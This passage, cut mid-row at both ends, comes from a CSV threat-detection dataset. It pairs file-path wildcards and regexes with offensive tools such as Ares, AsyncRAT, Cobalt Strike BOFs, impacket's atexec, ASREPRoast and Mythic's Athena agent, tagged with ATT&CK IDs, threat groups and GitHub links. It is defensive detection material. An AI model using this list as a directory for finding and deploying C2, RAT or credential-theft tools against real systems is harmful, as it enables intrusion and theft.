TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*/Ares.git",".{0,1000}\/Ares\.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*/ares.py *",".{0,1000}\/ares\.py\s.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*/args_spoofing-rs.exe*",".{0,1000}\/args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/armitage.git*",".{0,1000}\/armitage\.git.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/arp_scanner.*",".{0,1000}\/arp_scanner\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/arp_spoof/*",".{0,1000}\/arp_spoof\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/arsenal.git*",".{0,1000}\/arsenal\.git.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.1.0.zip*",".{0,1000}\/arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.2.0.zip*",".{0,1000}\/arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-1.2.1.zip*",".{0,1000}\/arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/arsenal-master.zip*",".{0,1000}\/arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/artifactor.py*",".{0,1000}\/artifactor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/ase_docker/*",".{0,1000}\/ase_docker\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/asn-query.nse*",".{0,1000}\/asn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ASPJinjaObfuscator.git*",".{0,1000}\/ASPJinjaObfuscator\.git.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/ASRenum.cpp*",".{0,1000}\/ASRenum\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASRenum.cs*",".{0,1000}\/ASRenum\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASRenum-BOF*",".{0,1000}\/ASRenum\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*/ASREPRoast*",".{0,1000}\/ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*/asreproast_hashes_*.txt*",".{0,1000}\/asreproast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ASREProastables.txt*",".{0,1000}\/ASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/assets/bin2uuids_file.py*",".{0,1000}\/assets\/bin2uuids_file\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/assets/wraith-scripts/*",".{0,1000}\/assets\/wraith\-scripts\/.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/AsyncRAT-C%23*",".{0,1000}\/AsyncRAT\-C\%23.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*/AsyncRAT-C-Sharp*",".{0,1000}\/AsyncRAT\-C\-Sharp.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*/asyncssh_server.py*",".{0,1000}\/asyncssh_server\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/Athena-*.zip*",".{0,1000}\/Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.csproj*",".{0,1000}\/Athena\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.exe*",".{0,1000}\/Athena\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.cs*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.exe*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.Profiles.*.py*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena.sln*",".{0,1000}\/Athena\.sln.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena/Assembly/*.*",".{0,1000}\/Athena\/Assembly\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Athena/Commands/*.*",".{0,1000}\/Athena\/Commands\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/athena/mythic*",".{0,1000}\/athena\/mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/athena_utils/*.py*",".{0,1000}\/athena_utils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaPlugins/bin/*",".{0,1000}\/AthenaPlugins\/bin\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AthenaSMB/*",".{0,1000}\/AthenaSMB\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 